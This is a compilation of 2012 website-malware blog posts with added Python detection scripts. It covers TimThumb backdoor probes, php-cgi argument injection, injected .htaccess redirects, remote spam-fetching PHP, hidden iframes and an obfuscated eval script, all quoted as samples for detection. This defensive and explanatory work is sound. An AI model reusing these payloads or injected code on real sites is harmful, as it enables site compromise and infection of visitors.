Plesk Vulnerability Leading to Malware

Our friends over at Unmask Parasites posted two very good reports about a mix of Plesk vulnerabilities being used to mass-compromise websites, and redirecting them to the Blackhole Exploit Kit.

The first issue is that old versions of Plesk store passwords in clear text (yes, clear text in 2012). The second is a remote SQL injection vulnerability found in old versions of Plesk that lets attackers dump the database, and with it those clear-text passwords.

clear text password + database dump = Mass password leaks

This has possibly allowed attackers to gain access to a large number of passwords and hosts/sites. We recommend reading those two posts to understand the issue:


Sucuri Labs Weekly Review – June 22nd – 2012

Have you checked out Sucuri Labs? We have been adding a daily feed of the top web-based malware samples that we find, along with the number of compromised sites.

We separate the data into three main categories:

  • Hidden iframes
  • Conditional redirections (generally done via .htaccess)
  • Encoded javascript.

This helps us understand how sites are getting compromised and how the malware is being executed in the browser.


Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries per day show malicious warnings
  • Provide warnings for about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Send thousands of notifications daily to Internet Service Providers (ISPs)


Sucuri SiteCheck – Web Malware Distribution – May 2012

Last month (May 2012), we were able to identify 94,866 compromised (hacked) websites using our free SiteCheck scanner.

These were the top infections per distribution type (iframes and conditional redirections; a comparison to April can be seen here: Sucuri SiteCheck – Web Malware Distribution – April 2012):

You can more closely follow the daily activity in our labs on the Sucuri Labs page.

Conditional (often .htaccess) redirections:


List of Domains Hosting Webshells for Timthumb Attacks

We have been tracking TimThumb related attacks for a while and they are still in full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for that type of attack and a botnet with more than 1,000 IP addresses scanning for sites that might be vulnerable to it.

If you look at your logs, this is what it looks like:

216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""

or

112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""

Basically, they are probing hundreds of theme paths per site for an old timthumb.php and trying to make it fetch the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php. Note the host names: old TimThumb versions only fetched remote files from a short list of trusted sites (blogger.com, img.youtube.com and a few others), but the check was a substring match, so a domain that merely starts with a trusted name passes it.
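As an added example (not code from the original post or from Sucuri), here is a small log scanner that picks these probes out of an Apache access log. It flags TimThumb requests whose src= host only contains a trusted name as a prefix, and requests where the "image" is really a .php file. The allowed-host list is an assumption reconstructed from memory of old TimThumb defaults, and the sample log lines are constructed (the first two copy the probes shown above).

```python
import re
from urllib.parse import parse_qs, urlparse

# Apache combined log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Script names the scanners probe for (thumb.php was a common rename).
SCRIPT_RE = re.compile(r'/(timthumb|thumb)\.php$', re.I)

# Hosts that vulnerable TimThumb 1.x releases trusted for remote fetches.
# Assumption: reconstructed from memory of the old default list. The old
# check was a substring match, so "img.youtube.com.attacker.example" passed
# as if it were img.youtube.com.
ALLOWED_HOSTS = ('flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com',
                 'img.youtube.com')


def classify_request(path):
    """Classify one request path. Returns None for anything that is not a
    TimThumb fetch with a src= parameter, else a dict with the src host and
    a 'kind' describing how suspicious it is."""
    # Split by hand: urlparse('//wp-content/...') would treat '//' as a netloc.
    script, _, query = path.partition('?')
    if not SCRIPT_RE.search(script):
        return None
    src = parse_qs(query).get('src', [''])[0]
    if not src:
        return None
    parsed = urlparse(src)
    host = (parsed.hostname or '').lower()
    if host in ALLOWED_HOSTS or host.endswith(tuple('.' + h for h in ALLOWED_HOSTS)):
        kind = 'allowed-host'
    elif any(h in host for h in ALLOWED_HOSTS):
        kind = 'spoofed-allowed-host'   # trusted name used as a subdomain prefix
    else:
        kind = 'external-host'
    if parsed.path.lower().endswith(('.php', '.phtml', '.php5')):
        kind += '+php-payload'          # an "image" that is a script: backdoor drop
    return {'script': script, 'src': src, 'host': host, 'kind': kind}


def scan_log(lines):
    """Return the TimThumb requests worth looking at (anything but a plain
    image fetch from a trusted host), with the requesting IP and status."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group('path'))
        if finding and finding['kind'] != 'allowed-host':
            hits.append({'ip': m.group('ip'), 'status': m.group('status'), **finding})
    return hits


# Constructed sample: the two probes from the post plus two benign requests.
SAMPLE_LOG = [
    '216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""',
    '112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""',
    '198.51.100.7 - - [31/May/2012:04:01:02 +0000] "GET /wp-content/themes/twentyten/timthumb.php?src=http://img.youtube.com/vi/abc123/0.jpg&w=100 HTTP/1.1" 200 4102 "http://example.com/" "Mozilla/5.0"',
    '198.51.100.8 - - [31/May/2012:04:02:10 +0000] "GET /wp-login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ip'], hit['status'], hit['kind'], hit['src'])
```

A 404 on these lines means the theme was not installed on that site; a 200 from a probe of this shape is the one to investigate, starting with the TimThumb cache directory.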

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb.

Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

“To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them”. We are seeing many WordPress sites compromised with malware that redirects users to the “Windows Web Secure Kit” fake/rogue antivirus. So if you get that message when visiting your site (or any site), that site is likely compromised by it.

What is going on?

Once a site gets compromised, its .htaccess file gets modified to redirect users running Windows and coming from search engines to some Russian sites:

http://colceadem.ru/infinity?8 OR
http://ademcolce.ru/infinity?8 OR
http://tradeincas.ru/siga?7 OR many others

These then redirect the user to some intermediate sites (also .ru):
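As an added example (not from the original post), the following checker walks an .htaccess file and reports rewrite rules that send visitors to another host, keeping track of the RewriteCond lines attached to each rule. Rules that are gated on the referer or user agent, as in this campaign, are the ones rated high. The sample .htaccess is constructed: stock WordPress rules followed by an injected block of the shape described above; the own_hosts list is an assumption about which redirect targets the site owner expects.

```python
import re
from urllib.parse import urlparse

COND_RE = re.compile(r'^\s*RewriteCond\s+(?P<test>\S+)\s+(?P<pattern>\S+)', re.I)
RULE_RE = re.compile(
    r'^\s*RewriteRule\s+(?P<pattern>\S+)\s+(?P<target>\S+)(?:\s+\[(?P<flags>[^\]]*)\])?', re.I)

# Request properties an attacker keys on so that only the victims (search
# engine traffic, a given OS or browser) see the redirect and the owner never does.
CLIENT_VARS = ('HTTP_REFERER', 'HTTP_USER_AGENT', 'HTTP_COOKIE', 'REMOTE_ADDR')


def find_conditional_redirects(htaccess_text, own_hosts=()):
    """Report RewriteRules whose target is another host. Apache applies
    RewriteCond lines only to the next RewriteRule, so conditions are
    collected until a rule consumes them. own_hosts (assumed) lists host
    names the site legitimately redirects to."""
    findings = []
    pending = []                            # RewriteCond lines not yet attached to a rule
    for line in htaccess_text.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        m = COND_RE.match(line)
        if m:
            pending.append((m.group('test'), m.group('pattern')))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        conds, pending = pending, []        # this rule consumes the pending conditions
        target = m.group('target')
        host = (urlparse(target).hostname or '').lower()
        if not host or host in own_hosts:
            continue                        # internal rewrite or an expected redirect
        gated_on = [c for c in conds if any(v in c[0].upper() for v in CLIENT_VARS)]
        findings.append({
            'target': target,
            'host': host,
            'gated_on': gated_on,
            'flags': m.group('flags') or '',
            # a cloaked external redirect is the pattern of this campaign
            'severity': 'high' if gated_on else 'low',
        })
    return findings


# Constructed sample: stock WordPress rules, then an injected block that sends
# Windows users arriving from search engines to one of the .ru hosts above.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
RewriteCond %{HTTP_REFERER} (google|yahoo|bing|msn|live|aol|ask)\\. [NC]
RewriteCond %{HTTP_USER_AGENT} Windows [NC]
RewriteRule ^(.*)$ http://colceadem.ru/infinity?8 [R=302,L]
"""

if __name__ == '__main__':
    for finding in find_conditional_redirects(SAMPLE_HTACCESS, own_hosts=('example.com',)):
        print(finding['severity'], finding['target'], finding['gated_on'])
```

This is also why the owner rarely notices: typing the URL directly sends no referer, so the conditions never match for them, and only search-engine visitors on Windows are redirected.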



Wpstats.org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if (function_exists('curl_init')) {
    // the "jQuery" file is really a block of spam links served by wpstats.org
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data"; // whatever the remote server returns is written into the page
}

If you are not familiar with PHP, this code contacts www.wpstats.org/jquery-1.6.3.min.js (named to look like a jQuery file), which returns a long list of hidden links that get echoed into your site (not visible in a normal browser).


PHP-CGI Vulnerability Exploited in the Wild

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we have noticed that the attack starts in two ways, either by checking if the server is vulnerable using the ?-s option (which makes php-cgi print the script's source instead of running it):
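As an added example (not from the original post), here is the check I would run over an access log to find these probes. The php-cgi bug (CVE-2012-1823) is that a query string containing no "=" is treated as an RFC 3875 indexed query, split on "+" and handed to php-cgi as command-line switches; ?-s is the harmless probe, and the widely reported follow-up, not shown on this page, uses -d to set ini options with "=" hidden as %3d. The detector therefore tests the raw query for "=" before decoding, exactly as php-cgi did. All sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Apache combined log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SWITCH_RE = re.compile(r'^-[A-Za-z]')    # decoded query that starts like a php-cgi switch


def classify_query(raw_query):
    """Return a finding if php-cgi would have treated this query string as
    command-line arguments (CVE-2012-1823), else None.

    An indexed query (no '=' anywhere in the raw string) is split on '+' and
    passed as argv. Only the raw string is checked for '=', so attackers hide
    '=' as %3d and spaces as '+'; decode the same way to see what they sent."""
    if not raw_query or '=' in raw_query:
        return None
    decoded = unquote(raw_query.replace('+', ' '))
    if not SWITCH_RE.match(decoded):
        return None
    args = decoded.split()
    if '-s' in args:
        kind = 'source-disclosure'          # php-cgi -s prints the script source
    elif any(a.startswith('-d') for a in args):
        kind = 'option-injection'           # -d sets ini options for this request
    else:
        kind = 'argv-injection'
    return {'raw': raw_query, 'decoded': decoded, 'kind': kind}


def scan_log(lines):
    """Return every request whose query string would reach php-cgi as argv."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        script, _, query = m.group('path').partition('?')
        finding = classify_query(query)
        if finding:
            hits.append({'ip': m.group('ip'), 'method': m.group('method'),
                         'script': script, **finding})
    return hits


# Constructed sample: a -s probe, a -d follow-up, and two benign look-alikes.
SAMPLE_LOG = [
    '203.0.113.9 - - [07/May/2012:22:14:03 +0000] "GET /index.php?-s HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/May/2012:22:14:05 +0000] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [07/May/2012:22:15:10 +0000] "GET /index.php?page=-s HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [07/May/2012:22:16:44 +0000] "GET /search.php?s HTTP/1.1" 200 1111 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ip'], hit['method'], hit['script'], hit['kind'], hit['decoded'])
```

A 200 on the -s probe with a body size that looks like PHP source (rather than the rendered page) is the tell that the host is exposed; the page=-s line is harmless because the "=" keeps it a normal query.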


Sucuri SiteCheck – Web Malware Distribution – April 2012

When we see a compromised site distributing malware, it is usually done via one of four methods: iframe injection, JavaScript injection, spam, or internal redirections. Those are not the only ways, and they can be encoded or hidden differently inside the site, but the final output on the compromised site is generally one of them:

  1. Iframe injection: makes the browser load content from external (and malicious) web sites. Example: <iframe src="http://pokosa.com/tds/go.php?sid=1" ..
  2. Javascript injection: used to encode (hide) calls to iframes or additional remote javascript includes. Example: <script>d= Date ;d=new d();h=-parseInt("012")/5;if(window.document)try{new document.getElementById("qwe")…. (this code redirects users to the Blackhole exploit kit)
  3. .htaccess (or conditional) redirections: used to redirect anyone visiting the site from search engines (or with specific user agents/referers) to malware or spam content.
  4. Blackhat SEO spam: not really malware in the strict sense (it won't infect anyone visiting the site), but it is still harmful for the webmaster and the site's reputation (imagine a corporate site redirecting to an online viagra store).
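As an added example (not from the original post), here is a page scanner for the first two output forms: iframes to another host that are sized or styled so the visitor never sees them, and inline scripts that look packed or encoded. The hiding criteria and the obfuscation markers are assumed heuristics of my own, not a signature for any particular kit, and the sample HTML is constructed (the hidden iframe reuses the pokosa.com URL quoted above).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that keep an element out of view (assumed heuristic).
HIDDEN_STYLE_RE = re.compile(
    r'display\s*:\s*none|visibility\s*:\s*hidden|(left|top)\s*:\s*-\d', re.I)

# Markers of encoded or self-decoding script (assumed heuristic).
JS_INDICATORS = ('eval(', 'unescape(', 'fromCharCode', 'document.write(', '\\x', '%u')


class PageCollector(HTMLParser):
    """Collect iframe attributes and script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or '') for k, v in attrs}
        if tag == 'iframe':
            self.iframes.append(attrs)
        elif tag == 'script':
            self._in_script = True
            self.scripts.append({'src': attrs.get('src', ''), 'body': ''})

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1]['body'] += data


def _dimension(value):
    """'1', '1px', '0' -> int; missing or non-numeric -> None."""
    digits = re.sub(r'[^0-9]', '', value)
    return int(digits) if digits else None


def is_hidden_external_iframe(attrs, site_host):
    """True for an iframe pointing off-site that is 0/1 pixel or styled invisible."""
    host = (urlparse(attrs.get('src', '')).hostname or '').lower()
    if not host or host == site_host:
        return False
    width, height = _dimension(attrs.get('width', '')), _dimension(attrs.get('height', ''))
    tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
    styled_hidden = bool(HIDDEN_STYLE_RE.search(attrs.get('style', '')))
    return tiny or styled_hidden


def script_suspicion(body):
    """Count obfuscation markers; a long blob with almost no spaces adds one."""
    body = body.strip()
    score = sum(1 for marker in JS_INDICATORS if marker in body)
    if len(body) > 200 and body.count(' ') / len(body) < 0.02:
        score += 1
    return score


def scan_html(html, site_host, threshold=2):
    """Return hidden off-site iframes and inline scripts scoring >= threshold."""
    collector = PageCollector()
    collector.feed(html)
    return {
        'hidden_iframes': [f for f in collector.iframes
                           if is_hidden_external_iframe(f, site_host)],
        'suspicious_scripts': [s for s in collector.scripts
                               if script_suspicion(s['body']) >= threshold],
    }


# Constructed sample: a legitimate embed and script next to an injected
# 1x1 hidden iframe and a self-decoding script.
SAMPLE_HTML = """\
<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>
<iframe src="https://player.example.net/embed/123" width="560" height="315"></iframe>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="1" height="1" style="visibility:hidden"></iframe>
<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,62,39,41));</script>
</body></html>
"""

if __name__ == '__main__':
    result = scan_html(SAMPLE_HTML, 'example.com')
    for frame in result['hidden_iframes']:
        print('hidden iframe ->', frame['src'])
    for script in result['suspicious_scripts']:
        print('suspicious script:', script['body'][:60])
```

Run it against the page as a browser receives it, not against the theme files on disk: several of the injections above are only assembled at request time (by .htaccess or by code like the curl snippet), so the served HTML is the only place all four forms show up.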

April / 2012 stats



Malware campaign against WordPress sites (recovery-hdd dot eu)

We have been tracking a new malware campaign that has compromised thousands of WordPress sites over the last 3 days. They are not doing anything new, but are using old vulnerabilities in plugins and themes, especially TimThumb, to add iframes to as many sites as they can. Unfortunately, they have been very successful so far.

They are using many domains, but the most common one is recovery-hdd.eu, followed by almazzao-co.eu, hence the name of the campaign.

Another tactic they are using is hosting their malware on hijacked domain names from legitimate sites and on free domain registration services (the iframe URL takes the form domain.com/images.php?t=44443094).

Here are some of the iframes we have seen them using lately:

